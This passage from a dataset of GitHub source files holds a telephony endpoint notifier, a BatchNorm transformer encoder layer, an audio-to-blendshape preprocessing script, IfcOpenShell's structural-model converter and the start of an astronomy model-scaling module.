IAXSchema(only=ENDPOINT_IAX_FIELDS).dump(iax)\n event = IAXEndpointCreatedEvent(iax_serialized, iax.tenant_uuid)\n self.bus.queue_event(event)\n\n def edited(self, iax):\n self.send_sysconfd_handlers()\n iax_serialized = IAXSchema(only=ENDPOINT_IAX_FIELDS).dump(iax)\n event = IAXEndpointEditedEvent(iax_serialized, iax.tenant_uuid)\n self.bus.queue_event(event)\n\n def deleted(self, iax):\n self.send_sysconfd_handlers()\n iax_serialized = IAXSchema(only=ENDPOINT_IAX_FIELDS).dump(iax)\n event = IAXEndpointDeletedEvent(iax_serialized, iax.tenant_uuid)\n self.bus.queue_event(event)\n\n\ndef build_notifier():\n return IAXEndpointNotifier(sysconfd, bus)\n","repo_name":"wazo-platform/wazo-confd","sub_path":"wazo_confd/plugins/endpoint_iax/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"39478371960","text":"from src.library import *\n\n\nclass TransformerBatchNormEncoderLayer(nn.modules.Module):\n \"\"\"Transformer encoder with BatchNorm instead of LayerNorm.\n\n Args:\n d_model: the number of expected features in the input (required).\n nhead: the number of heads in the multihead attention models (required).\n dim_feedforward: the dimension of the feedforward network model (default=2048).\n dropout: the dropout value (default=0.1).\n activation: the activation function of intermediate layer, relu or gelu (default=relu).\n \"\"\"\n\n def __init__(\n self,\n d_model: int,\n nhead: int,\n dim_feedforward: int = 2048,\n dropout: float = 0.1,\n activation: str = \"relu\",\n ):\n super(TransformerBatchNormEncoderLayer, self).__init__()\n self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout)\n # Implementation of Feedforward model\n self.linear1 = Linear(d_model, dim_feedforward)\n self.dropout = Dropout(dropout)\n self.linear2 = Linear(dim_feedforward, d_model)\n\n self.norm1 = BatchNorm1d(\n d_model, eps=1e-5\n ) # normalizes each feature across batch samples and time steps\n self.norm2 = BatchNorm1d(d_model, eps=1e-5)\n self.dropout1 = Dropout(dropout)\n self.dropout2 = Dropout(dropout)\n\n self.activation = get_activation_fn(activation)\n\n def __setstate__(self, state):\n if \"activation\" not in state:\n state[\"activation\"] = F.relu\n super(TransformerBatchNormEncoderLayer, self).__setstate__(state)\n\n def 
forward(\n self,\n src: Tensor,\n src_mask: Optional[Tensor] = None,\n src_key_padding_mask: Optional[Tensor] = None,\n is_causal: bool = False,\n ) -> Tensor:\n r\"\"\"Pass the input through the encoder layer.\n\n Args:\n src: the sequence to the encoder layer.\n src_mask: the mask for the src sequence.\n src_key_padding_mask: the mask for the src keys per batch.\n is_causal: flag for causaility. Present for compatibility with nn.\n \"\"\"\n src2 = self.self_attn(\n src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask\n )[0]\n src = src + self.dropout1(src2) # (seq_len, batch_size, d_model)\n src = src.permute(1, 2, 0) # (batch_size, d_model, seq_len)\n src = self.norm1(src)\n src = src.permute(2, 0, 1) # restore (seq_len, batch_size, d_model)\n src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))\n src = src + self.dropout2(src2) # (seq_len, batch_size, d_model)\n src = src.permute(1, 2, 0) # (batch_size, d_model, seq_len)\n src = self.norm2(src)\n src = src.permute(2, 0, 1) # restore (seq_len, batch_size, d_model)\n return src\n","repo_name":"ludovicobuizza/HAR-Transformer","sub_path":"src/transformer/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"} +{"seq_id":"393398348","text":"\nimport sys, argparse, os, multiprocessing.pool\nfrom tqdm import tqdm\n\nimport ffmpeg, torchaudio\nimport pandas as pd\nimport numpy as np\nimport torch, librosa\n\n\nclass Preprocessor:\n HERTZ = 50\n\n def __init__(self, source_dir, target_dir, ignored_columns, start_idx=0, end_idx=None):\n self.source_dir = source_dir\n self.start_idx = start_idx\n recording_directories = sorted([d.path for d in os.scandir(self.source_dir) if d.is_dir()])\n if end_idx is None:\n self.recording_directories = recording_directories[start_idx:]\n else:\n self.recording_directories = recording_directories[start_idx:end_idx]\n self.target_dir = target_dir\n self.ignored_columns = ignored_columns\n\n if not os.path.exists(self.target_dir):\n os.mkdir(self.target_dir)\n\n self.wav_dir = os.path.join(self.target_dir, 'wav')\n if not os.path.exists(self.wav_dir):\n os.mkdir(self.wav_dir)\n\n self.essentials_dir = os.path.join(self.target_dir, 'essentials')\n if not os.path.exists(self.essentials_dir):\n os.mkdir(self.essentials_dir)\n\n\n def save_audio(self, source_media, wav_name):\n target_audio = os.path.join(self.wav_dir, f'{wav_name}.wav')\n\n try:\n (ffmpeg\n .input(source_media, vn=None)\n .output(filename=target_audio,\n ac=1, \n acodec='pcm_s16le', \n ar='16k', \n loglevel='quiet', \n nostats=None)\n .run(overwrite_output=True))\n\n except:\n print(f'ffmpeg on {source_media} failed')\n\n print(f'{wav_name}.wav saved.')\n\n return target_audio\n\n\n def audio_preprocessing(self, wav):\n audio_tensor, sample_rate = torchaudio.load(wav)\n squeezed_audio_tensor = audio_tensor.squeeze()\n squeezed_audio_ndarray = squeezed_audio_tensor.numpy()\n\n n_fft = int(sample_rate / self.HERTZ)\n hop_length = int(sample_rate / (self.HERTZ * 2))\n D = librosa.stft(squeezed_audio_ndarray, \n n_fft=n_fft, \n win_length=n_fft, \n hop_length=hop_length, \n window='hamming')\n spectrogram, phase = librosa.magphase(D)\n\n # S = log(S+1)\n log_spectrogram = np.log1p(spectrogram)\n mean, stdev = log_spectrogram.mean(), log_spectrogram.std()\n normalized_spectrogram = (log_spectrogram - mean) / stdev\n normalized_spectrogram_tensor = torch.FloatTensor(normalized_spectrogram)\n\n return 
normalized_spectrogram_tensor.T, sample_rate\n\n def blendshape_preprocessing(self, source_shape):\n df = pd.read_csv(source_shape)\n shape = {key: value.tolist() for key, value in df.to_dict('series').items()\n if key not in self.ignored_columns}\n\n return shape\n\n\n def get_data(self, recording_directory):\n recording_files = os.listdir(recording_directory)\n\n for recording_file in recording_files:\n if recording_file.endswith('.mov'):\n media = os.path.join(recording_directory, recording_file)\n elif recording_file.endswith('cal.csv'):\n shape = os.path.join(recording_directory, recording_file)\n \n try:\n media\n except:\n print(f'Directory {recording_directory} does not contain video file')\n try:\n shape\n except:\n print(f'Directory {recording_directory} does not contain calibrated Blendshape csv file')\n\n return media, shape\n\n def save_essentials(self, spec, sample_rate, blendshape, pt_name):\n target_essentials = os.path.join(self.essentials_dir, f'{pt_name}.pt')\n essentials = (spec, sample_rate, blendshape)\n torch.save(essentials, target_essentials)\n print(f'{pt_name}.pt saved.')\n\n def preprocess(self):\n # if self.threads > 1:\n # with multiprocessing.pool.Pool(processes=self.threads) as pool:\n # self.data = pool.starmap(self.sample_dispatcher, zip(self.recording_directories, range(len(self.recording_directories))))\n\n # elif self.threads == 1:\n for recording_directory, count in zip(self.recording_directories, range(len(self.recording_directories))):\n count += self.start_idx\n print(f\"Processing No.{count} - {os.path.basename(recording_directory)}\")\n count_with_name = f\"{count}_{os.path.basename(recording_directory)}\"\n mov_path, source_shape = self.get_data(recording_directory)\n wav_audio_path = self.save_audio(mov_path, count_with_name)\n spec, sample_rate = self.audio_preprocessing(wav_audio_path)\n blendshape = self.blendshape_preprocessing(source_shape)\n self.save_essentials(spec, sample_rate, blendshape, count_with_name)\n\n def sample_dispatcher(self, recording_directory, count):\n count += self.start_idx\n print(f\"Processing No.{count} - {os.path.basename(recording_directory)}\")\n count_with_name = f\"{count}_{os.path.basename(recording_directory)}\"\n mov_path, source_shape = self.get_data(recording_directory)\n wav_audio_path = self.save_audio(mov_path, count_with_name)\n spec, sample_rate = self.audio_preprocessing(wav_audio_path)\n blendshape = self.blendshape_preprocessing(source_shape)\n return spec, sample_rate, blendshape, count_with_name\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Preprocess data')\n parser.add_argument('--source', help='Path to source directory', required=True)\n parser.add_argument('--target', help='Path to target directory', required=True)\n parser.add_argument('--start_idx', help='Start index of source', default=0)\n parser.add_argument('--threads', help='threads', default=1)\n parser.add_argument('--ignore', nargs='*', help='List of ignored columns', default=[])\n\n args = parser.parse_args()\n\n preprocessor = Preprocessor(\n source_dir=args.source,\n target_dir=args.target, \n ignored_columns=args.ignore,\n start_idx=int(args.start_idx))\n preprocessor.preprocess()\n","repo_name":"ishine/speech2blendshape","sub_path":"new_preprocess.py","file_name":"new_preprocess.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"23924372323","text":"from __future__ import division\nfrom 
__future__ import print_function\nimport json\nimport ifcopenshell\nimport numpy as np\nfrom pathlib import Path\n\n\nclass IFC2CA:\n def __init__(self, filename):\n self.filename = filename\n self.file = None\n self.result = {}\n self.warnings = []\n self.tol = 1e-06\n\n def convert(self):\n self.file = ifcopenshell.open(self.filename)\n for model in self.file.by_type(\"IfcStructuralAnalysisModel\"):\n elements = self.get_structural_items(model, item_type=\"IfcStructuralMember\")\n connections = self.get_structural_items(\n model, item_type=\"IfcStructuralConnection\"\n )\n\n materialdb = []\n materials = list(dict.fromkeys([e[\"material\"] for e in elements]))\n for mat in [mat for mat in materials if mat]:\n id = int(mat.split(\"|\")[1])\n material = self.get_material_properties(self.file.by_id(id))\n material[\"relatedElements\"] = [\n e[\"referenceName\"]\n for e in elements\n if \"material\" in e and e[\"material\"] == mat\n ]\n materialdb.append(material)\n\n profiledb = []\n profiles = list(\n dict.fromkeys([e[\"profile\"] for e in elements if \"profile\" in e])\n )\n for prof in [prof for prof in profiles if prof]:\n id = int(prof.split(\"|\")[1])\n profile = self.get_profile_properties(self.file.by_id(id))\n profile[\"relatedElements\"] = [\n e[\"referenceName\"]\n for e in elements\n if \"profile\" in e and e[\"profile\"] == prof\n ]\n profiledb.append(profile)\n\n self.result = {\n \"referenceName\": model.is_a() + \"|\" + str(model.id()),\n \"name\": model.Name,\n \"id\": model.GlobalId,\n \"elements\": elements,\n \"connections\": connections,\n \"db\": {\"materials\": materialdb, \"profiles\": profiledb},\n \"warnings\": self.warnings,\n }\n\n print(f\"Model {model.Name} converted\")\n print(f\"Number of elements: {len(elements)}\")\n print(f\"Number of connections: {len(connections)}\")\n print(f\"Number of materials: {len(materialdb)}\")\n print(f\"Number of profiles: {len(profiledb)}\")\n print(\"\")\n\n break\n\n def get_structural_items(self, model, item_type=\"IfcStructuralItem\"):\n items = []\n for group in model.IsGroupedBy:\n for item in group.RelatedObjects:\n if not item.is_a(item_type):\n continue\n data = self.get_item_data(item)\n if data:\n items.append(data)\n return items\n\n def get_item_data(self, item):\n transformation = self.get_transformation(item.ObjectPlacement)\n\n if item.is_a(\"IfcStructuralCurveMember\"):\n representation = self.get_representation(item, \"Edge\")\n material_profile = self.get_material_profile(item)\n if not representation:\n self.warnings.append(\n f\"No representation defined for {item.is_a()}|{item.id()}. 
Member excluded\"\n )\n return\n if not material_profile:\n self.warnings.append(f\"No material defined for {item.is_a()}|{item.id()}\")\n self.warnings.append(f\"No profile defined for {item.is_a()}|{item.id()}\")\n materialId = None\n profileId = None\n else:\n material = material_profile.Material\n materialId = material.is_a() + \"|\" + str(material.id())\n profile = material_profile.Profile\n profileId = profile.is_a() + \"|\" + str(profile.id())\n\n geometry = self.get_geometry(representation)\n orientation = self.get_1D_orientation(geometry, item.Axis)\n connections = self.get_connection_data(item.ConnectedBy)\n for conn in connections:\n if not conn[\"orientation\"]:\n conn[\"orientation\"] = orientation\n # --> Correct pointOnElement for eccentricity connection for ETABS files\n length = np.linalg.norm(np.array(geometry[1]) - np.array(geometry[0]))\n for c in connections:\n if c[\"eccentricity\"]:\n if (\n np.linalg.norm(np.array(c[\"eccentricity\"][\"pointOnElement\"]))\n > length + self.tol\n ):\n print(\n f\"{np.linalg.norm(np.array(c['eccentricity']['pointOnElement']))} > {length}\"\n )\n self.warnings.append(\n f\"Eccentricity in {item.is_a()}|{item.id()} corrected\"\n )\n c[\"eccentricity\"][\"pointOnElement\"][0] = length\n # End <--\n if transformation:\n geometry = self.transform_vectors(geometry, transformation)\n orientation = self.transform_vectors(\n orientation, transformation, include_translation=False\n )\n for c in connections:\n c[\"orientation\"] = self.transform_vectors(\n c[\"orientation\"], transformation, include_translation=False\n )\n if c[\"eccentricity\"]:\n c[\"eccentricity\"][\"vector\"] = self.transform_vectors(\n c[\"eccentricity\"][\"vector\"],\n transformation,\n include_translation=False,\n )\n\n return {\n \"referenceName\": f\"{item.is_a()}|{item.id()}\",\n \"name\": item.Name,\n \"id\": item.GlobalId,\n \"geometryType\": \"line\",\n \"predefinedType\": item.PredefinedType,\n \"geometry\": geometry,\n \"orientation\": orientation,\n \"material\": materialId,\n \"profile\": profileId,\n \"connections\": connections,\n }\n\n elif item.is_a(\"IfcStructuralSurfaceMember\"):\n representation = self.get_representation(item, \"Face\")\n material = self.get_material_profile(item)\n if not representation:\n self.warnings.append(\n f\"No representation defined for {item.is_a()}|{item.id()}. 
Member excluded\"\n )\n return\n if not material:\n self.warnings.append(f\"No material defined for {item.is_a()}|{item.id()}\")\n materialId = None\n else:\n materialId = material.is_a() + \"|\" + str(material.id())\n\n geometry = self.get_geometry(representation)\n orientation = self.get_2D_orientation(representation)\n connections = self.get_connection_data(item.ConnectedBy)\n for conn in connections:\n if not conn[\"orientation\"]:\n conn[\"orientation\"] = orientation\n if transformation:\n geometry = self.transform_vectors(geometry, transformation)\n orientation = self.transform_vectors(\n orientation, transformation, include_translation=False\n )\n for c in connections:\n c[\"orientation\"] = self.transform_vectors(\n c[\"orientation\"], transformation, include_translation=False\n )\n\n return {\n \"referenceName\": f\"{item.is_a()}|{item.id()}\",\n \"name\": item.Name,\n \"id\": item.GlobalId,\n \"geometryType\": \"surface\",\n \"predefinedType\": item.PredefinedType,\n \"thickness\": item.Thickness,\n \"geometry\": geometry,\n \"orientation\": orientation,\n \"material\": materialId,\n \"connections\": connections,\n }\n\n elif item.is_a(\"IfcStructuralPointConnection\"):\n representation = self.get_representation(item, \"Vertex\")\n if not representation:\n self.warnings.append(\n f\"No representation defined for {item.is_a()}|{item.id()}. Member excluded\"\n )\n return\n\n geometry = self.get_geometry(representation)\n orientation = self.get_0D_orientation(item.ConditionCoordinateSystem)\n if not orientation:\n orientation = np.eye(3).tolist()\n if transformation:\n geometry = self.transform_vectors(geometry, transformation)\n orientation = self.transform_vectors(\n orientation, transformation, include_translation=False\n )\n\n return {\n \"referenceName\": f\"{item.is_a()}|{item.id()}\",\n \"name\": item.Name,\n \"id\": item.GlobalId,\n \"geometryType\": \"point\",\n \"geometry\": geometry,\n \"orientation\": orientation,\n \"appliedCondition\": self.get_connection_input(item, \"point\"),\n \"relatedElements\": [\n f\"{con.is_a()}|{con.id()}\" for con in item.ConnectsStructuralMembers\n ],\n }\n\n elif item.is_a(\"IfcStructuralCurveConnection\"):\n representation = self.get_representation(item, \"Edge\")\n if not representation:\n self.warnings.append(\n f\"No representation defined for {item.is_a()}|{item.id()}. Member excluded\"\n )\n return\n\n geometry = self.get_geometry(representation)\n orientation = self.get_1D_orientation(geometry, item.Axis)\n if not orientation:\n orientation = np.eye(3).tolist()\n if transformation:\n geometry = self.transform_vectors(geometry, transformation)\n orientation = self.transform_vectors(\n orientation, transformation, include_translation=False\n )\n\n return {\n \"referenceName\": f\"{item.is_a()}|{item.id()}\",\n \"name\": item.Name,\n \"id\": item.GlobalId,\n \"geometryType\": \"line\",\n \"geometry\": geometry,\n \"orientation\": orientation,\n \"appliedCondition\": self.get_connection_input(item, \"line\"),\n \"relatedElements\": [\n f\"{con.is_a()}|{con.id()}\" for con in item.ConnectsStructuralMembers\n ],\n }\n\n def get_transformation(self, placement):\n if not placement:\n return None\n if placement.is_a(\"IfcLocalPlacement\"):\n if placement.PlacementRelTo:\n print(\n \"Warning! 
Object Placement with PlacementRelTo attribute is not supported and will be neglected\"\n )\n axes = placement.RelativePlacement\n location = np.array(self.get_coordinate(axes.Location))\n if axes.Axis and axes.RefDirection:\n xAxis = np.array(\n axes.RefDirection.DirectionRatios\n ) # this can be not accurate (in the xz plane)\n zAxis = np.array(axes.Axis.DirectionRatios)\n zAxis /= np.linalg.norm(zAxis)\n yAxis = np.cross(zAxis, xAxis)\n yAxis /= np.linalg.norm(yAxis)\n xAxis = np.cross(yAxis, zAxis)\n xAxis /= np.linalg.norm(xAxis)\n else:\n if np.allclose(location, np.array([0.0, 0.0, 0.0])):\n return None\n xAxis = np.array([1.0, 0.0, 0.0])\n yAxis = np.array([0.0, 1.0, 0.0])\n zAxis = np.array([0.0, 0.0, 1.0])\n if (\n np.allclose(location, np.array([0.0, 0.0, 0.0]))\n and np.allclose(xAxis, np.array([1.0, 0.0, 0.0]))\n and np.allclose(yAxis, np.array([0.0, 1.0, 0.0]))\n and np.allclose(zAxis, np.array([0.0, 0.0, 1.0]))\n ):\n return None\n return {\n \"location\": location,\n \"rotationMatrix\": np.array([xAxis, yAxis, zAxis]).transpose(),\n }\n else:\n print(\n f\"Warning! Object Placement is of type {placement.is_a()}, which is not supported. Default considered\"\n )\n return None\n\n def get_representation(self, element, rep_type):\n if not element.Representation:\n return None\n for representation in element.Representation.Representations:\n rep = self.get_specific_representation(representation, \"Reference\", rep_type)\n if rep:\n return rep\n else:\n # print(\"Trying without rep identifier\")\n for representation in element.Representation.Representations:\n rep = self.get_specific_representation(representation, None, rep_type)\n if rep:\n return rep\n\n def get_specific_representation(self, representation, rep_id, rep_type):\n if (\n representation.RepresentationIdentifier == rep_id or rep_id is None\n ) and representation.RepresentationType == rep_type:\n return representation\n if representation.RepresentationType == \"MappedRepresentation\":\n return self.get_specific_representation(\n representation.Items[0].MappingSource.MappedRepresentation,\n rep_id,\n rep_type,\n )\n\n def get_geometry(self, representation):\n # Maybe IfcOpenShell can use create_shape here to simplify this, but\n # supposedly structural models are very simple anyway, so perhaps we\n # can do without it.\n item = representation.Items[0]\n if item.is_a(\"IfcEdge\"):\n return [\n self.get_coordinate(item.EdgeStart.VertexGeometry),\n self.get_coordinate(item.EdgeEnd.VertexGeometry),\n ]\n\n elif item.is_a(\"IfcFaceSurface\"):\n edges = item.Bounds[0].Bound.EdgeList\n coords = []\n for edge in edges:\n coords.append(\n self.get_coordinate(edge.EdgeElement.EdgeStart.VertexGeometry)\n )\n return coords\n\n elif item.is_a(\"IfcVertexPoint\"):\n return self.get_coordinate(item.VertexGeometry)\n\n def get_coordinate(self, point):\n if point.is_a(\"IfcCartesianPoint\"):\n return list(point.Coordinates)\n\n def get_0D_orientation(self, axes):\n if axes and axes.Axis and axes.RefDirection:\n xAxis = np.array(\n axes.RefDirection.DirectionRatios\n ) # this can be not strictly perpendicular (in the xz plane)\n zAxis = np.array(axes.Axis.DirectionRatios)\n zAxis /= np.linalg.norm(zAxis)\n yAxis = np.cross(zAxis, xAxis)\n yAxis /= np.linalg.norm(yAxis)\n xAxis = np.cross(yAxis, zAxis)\n xAxis /= np.linalg.norm(xAxis)\n\n return [xAxis.tolist(), yAxis.tolist(), zAxis.tolist()]\n else: # return None and copy the elements orientation\n return None\n\n def get_1D_orientation(self, geometry, zAxis):\n xAxis = 
np.array(geometry[1]) - np.array(geometry[0])\n xAxis /= np.linalg.norm(xAxis)\n zAxis = np.array(\n zAxis.DirectionRatios\n ) # this can be not strictly perpendicular (in the xz plane)\n yAxis = np.cross(zAxis, xAxis)\n yAxis /= np.linalg.norm(yAxis)\n zAxis = np.cross(xAxis, yAxis)\n zAxis /= np.linalg.norm(zAxis)\n\n return [xAxis.tolist(), yAxis.tolist(), zAxis.tolist()]\n\n def get_2D_orientation(self, representation):\n item = representation.Items[0]\n if item.is_a(\"IfcFaceSurface\"):\n axes = item.FaceSurface.Position\n orientation = self.get_0D_orientation(axes)\n if not orientation:\n self.warnings.append(\n f\"No local placement for Plane related to {item.is_a()}|{item.id()}. A unit orientation is considered\"\n )\n return np.eye(3).tolist()\n if not item.SameSense:\n orientation = [[-v for v in vec] for vec in orientation]\n return orientation\n\n def transform_vectors(self, geometry, trsf, include_translation=True):\n if not any(\n isinstance(el, list) for el in geometry\n ): # single point which contains no list\n geometry = [geometry]\n globalGeometry = []\n\n for p in geometry:\n gp = trsf[\"rotationMatrix\"].dot(np.array(p))\n if include_translation:\n gp += trsf[\"location\"]\n globalGeometry.append(gp.tolist())\n\n if len(globalGeometry) == 1: # single point\n globalGeometry = globalGeometry[0]\n\n return globalGeometry\n\n def get_material_profile(self, element):\n if not element.HasAssociations:\n return None\n for association in element.HasAssociations:\n if not association.is_a(\"IfcRelAssociatesMaterial\"):\n continue\n material = association.RelatingMaterial\n if material.is_a(\"IfcMaterialProfileSet\"):\n # For now, we only deal with a single profile\n return material.MaterialProfiles[0]\n if material.is_a(\"IfcMaterialProfileSetUsage\"):\n return material.ForProfileSet.MaterialProfiles[0]\n if material.is_a(\"IfcMaterial\"):\n return material\n\n def get_material_properties(self, material):\n psets = material.HasProperties\n\n if self.get_pset_properties(psets, \"Pset_MaterialMechanical\"):\n mechProps = self.get_pset_properties(psets, \"Pset_MaterialMechanical\")\n else:\n mechProps = self.get_pset_properties(psets, None)\n\n if self.get_pset_properties(psets, \"Pset_MaterialCommon\"):\n commonProps = self.get_pset_properties(psets, \"Pset_MaterialCommon\")\n else:\n commonProps = self.get_pset_properties(psets, None)\n\n return {\n \"referenceName\": material.is_a() + \"|\" + str(material.id()),\n \"name\": material.Name,\n \"category\": material.Category,\n \"mechProps\": mechProps,\n \"commonProps\": commonProps,\n }\n\n def get_pset_property(self, psets, pset_name, prop_name):\n for pset in psets:\n if pset.Name == pset_name or pset_name is None:\n for prop in pset.Properties:\n if prop.Name == prop_name:\n return prop.NominalValue.wrappedValue\n\n def get_pset_properties(self, psets, pset_name):\n for pset in psets:\n if pset.Name == pset_name or pset_name is None:\n d = {}\n for prop in pset.Properties:\n propName = prop.Name[0].lower() + prop.Name[1:]\n d[propName] = prop.NominalValue.wrappedValue\n return d\n\n def get_profile_properties(self, profile):\n if profile.is_a(\"IfcRectangleProfileDef\"):\n return {\n \"referenceName\": profile.is_a() + \"|\" + str(profile.id()),\n \"profileName\": profile.ProfileName,\n \"profileType\": profile.ProfileType,\n \"profileShape\": \"rectangular\",\n \"xDim\": profile.XDim,\n \"yDim\": profile.YDim,\n }\n\n if profile.is_a(\"IfcIShapeProfileDef\"):\n psets = profile.HasProperties\n\n if 
self.get_pset_properties(psets, \"Pset_ProfileMechanical\"):\n mechProps = self.get_pset_properties(psets, \"Pset_ProfileMechanical\")\n else:\n mechProps = self.get_i_section_properties(profile, \"iSymmetrical\")\n\n return {\n \"referenceName\": f\"{profile.is_a()}|{profile.id()}\",\n \"profileName\": profile.ProfileName,\n \"profileType\": profile.ProfileType,\n \"profileShape\": \"iSymmetrical\",\n \"mechProps\": mechProps,\n \"commonProps\": {\n \"flangeThickness\": profile.FlangeThickness,\n \"webThickness\": profile.WebThickness,\n \"overallDepth\": profile.OverallDepth,\n \"overallWidth\": profile.OverallWidth,\n \"filletRadius\": profile.FilletRadius,\n },\n }\n\n def get_connection_data(self, itemList):\n return [\n {\n \"referenceName\": f\"{rel.is_a()}|{rel.id()}\",\n \"id\": rel.GlobalId,\n \"relatingElement\": f\"{rel.RelatingStructuralMember.is_a()}|{rel.RelatingStructuralMember.id()}\",\n \"relatedConnection\": f\"{rel.RelatedStructuralConnection.is_a()}|{rel.RelatedStructuralConnection.id()}\",\n \"orientation\": self.get_0D_orientation(rel.ConditionCoordinateSystem),\n \"appliedCondition\": self.get_connection_input(\n rel,\n self.get_geometry_type_from_connection(\n rel.RelatedStructuralConnection\n ),\n ),\n \"eccentricity\": None\n if not rel.is_a(\"IfcRelConnectsWithEccentricity\")\n else {\n \"vector\": [\n 0.0\n if not rel.ConnectionConstraint.EccentricityInX\n else rel.ConnectionConstraint.EccentricityInX,\n 0.0\n if not rel.ConnectionConstraint.EccentricityInY\n else rel.ConnectionConstraint.EccentricityInY,\n 0.0\n if not rel.ConnectionConstraint.EccentricityInZ\n else rel.ConnectionConstraint.EccentricityInZ,\n ],\n \"pointOnElement\": self.get_coordinate(\n rel.ConnectionConstraint.PointOnRelatingElement\n ),\n },\n }\n for rel in itemList\n ]\n\n def get_geometry_type_from_connection(self, connection):\n if connection.is_a(\"IfcStructuralPointConnection\"):\n return \"point\"\n if connection.is_a(\"IfcStructuralCurveConnection\"):\n return \"line\"\n if connection.is_a(\"IfcStructuralSurfaceConnection\"):\n return \"surface\"\n\n def get_connection_input(self, connection, geometryType):\n if connection.AppliedCondition:\n if geometryType == \"point\":\n return {\n \"dx\": connection.AppliedCondition.TranslationalStiffnessX.wrappedValue,\n \"dy\": connection.AppliedCondition.TranslationalStiffnessY.wrappedValue,\n \"dz\": connection.AppliedCondition.TranslationalStiffnessZ.wrappedValue,\n \"drx\": connection.AppliedCondition.RotationalStiffnessX.wrappedValue,\n \"dry\": connection.AppliedCondition.RotationalStiffnessY.wrappedValue,\n \"drz\": connection.AppliedCondition.RotationalStiffnessZ.wrappedValue,\n }\n\n if geometryType == \"line\":\n return {\n \"dx\": connection.AppliedCondition.TranslationalStiffnessByLengthX.wrappedValue,\n \"dy\": connection.AppliedCondition.TranslationalStiffnessByLengthY.wrappedValue,\n \"dz\": connection.AppliedCondition.TranslationalStiffnessByLengthZ.wrappedValue,\n \"drx\": connection.AppliedCondition.RotationalStiffnessByLengthX.wrappedValue,\n \"dry\": connection.AppliedCondition.RotationalStiffnessByLengthY.wrappedValue,\n \"drz\": connection.AppliedCondition.RotationalStiffnessByLengthZ.wrappedValue,\n }\n\n if geometryType == \"surface\":\n return {\n \"dx\": connection.AppliedCondition.TranslationalStiffnessByAreaX.wrappedValue,\n \"dy\": connection.AppliedCondition.TranslationalStiffnessByAreaY.wrappedValue,\n \"dz\": connection.AppliedCondition.TranslationalStiffnessByAreaZ.wrappedValue,\n }\n\n return 
connection.AppliedCondition\n\n def get_i_section_properties(self, profile, profileShape):\n if profileShape == \"iSymmetrical\":\n tf = profile.FlangeThickness\n tw = profile.WebThickness\n h = profile.OverallDepth\n b = profile.OverallWidth\n\n A = b * h - (b - tw) * (h - 2 * tf)\n Iy = b * (h ** 3) / 12 - (b - tw) * ((h - 2 * tf) ** 3) / 12\n Iz = (2 * tf) * (b ** 3) / 12 + (h - 2 * tf) * (tw ** 3) / 12\n Jx = 1 / 3 * ((h - tf) * (tw ** 3) + 2 * b * (tf ** 3))\n\n return {\n \"crossSectionArea\": A,\n \"momentOfInertiaY\": Iy,\n \"momentOfInertiaZ\": Iz,\n \"torsionalConstantX\": Jx,\n }\n\n\nif __name__ == \"__main__\":\n fileNames = [\n \"cantilever_01\",\n \"portal_01\",\n \"grid_of_beams\",\n \"slab_01\",\n \"structure_01\",\n \"building_02\",\n ]\n files = fileNames\n\n for fileName in files:\n BASE_PATH = Path(\n \"/home/jesusbill/Dev-Projects/github.com/IfcOpenShell/analysis-models/ifcFiles/\"\n )\n ifc2ca = IFC2CA(BASE_PATH / f\"{fileName}.ifc\")\n ifc2ca.convert()\n with open(BASE_PATH / f\"{fileName}.json\", \"w\") as f:\n f.write(json.dumps(ifc2ca.result, indent=4))\n","repo_name":"IfcOpenShell/IfcOpenShell","sub_path":"src/ifc2ca/ifc2ca.py","file_name":"ifc2ca.py","file_ext":"py","file_size_in_byte":26025,"program_lang":"python","lang":"en","doc_type":"code","stars":1412,"dataset":"github-code","pt":"71"} +{"seq_id":"86284217892","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"Scale models to account for object distance\"\"\"\n\nimport os\nimport pandas as pd\nimport numpy as np\nfrom sofia_redux.calibration.pipecal_error import PipeCalError\n\n\ndef modconvert(infile, outfile, scale_factor=1.0):\n \"\"\"\n Scale a Herschel model by a constant factor.\n\n Parameters\n ----------\n infile : str\n Name of file containing Herschel model.\n outfile : str\n Name of file to write scaled model to.\n scale_factor : float\n Factor to scale model in `infile` by.\n\n Returns\n -------\n model : pandas.DataFrame\n The scaled model.\n\n \"\"\"\n index, freq, brightness_temp, flux, rj_temp = read_infile(infile)\n\n wave, flux, temp = sort_spectrum(freq, flux, brightness_temp)\n\n scaled_flux = scale_factor * flux\n\n plot_scaled_spectrum(wave, scaled_flux, scale_factor, infile)\n\n write_scaled_spectrum(wave, scaled_flux, scale_factor, temp,\n infile, outfile)\n\n model = pd.DataFrame({'wavelength': wave, 'flux': scaled_flux,\n 't_br': temp})\n return model\n\n\ndef read_infile(infile):\n \"\"\"\n Read in a Herschel model.\n\n Parameters\n ----------\n infile : str\n Name of Herchel file.\n\n Returns\n -------\n index : numpy.array\n Index value of each row in `infile`.\n freq : numpy.array\n Frequency of each row in `infile`.\n tbr : numpy.array\n Brightness temperature of each row in `infile`.\n flux : numpy.array\n Flux value of each row in `infile`.\n trj : numpy.array\n Rayleigh-Jeans temperature value of each row in `infile`.\n\n \"\"\"\n # There are a variable header lengths possible.\n # Loop through and look for when the line starts\n # with '1', the first index.\n nheader = 0\n try:\n with open(infile, 'r') as f:\n for line in f:\n if line.strip().startswith('1'):\n break\n nheader += 1\n except IOError:\n message = f'Unable to open {infile} in modconvert.'\n raise PipeCalError(message)\n index, freq, tbr, flux, trj = np.genfromtxt(infile, unpack=True,\n skip_header=nheader)\n return index, freq, tbr, flux, trj\n\n\ndef sort_spectrum(freq, flux, brightness_temp):\n \"\"\"\n Sort the flux and brightness temp by increasing wavelength.\n\n 
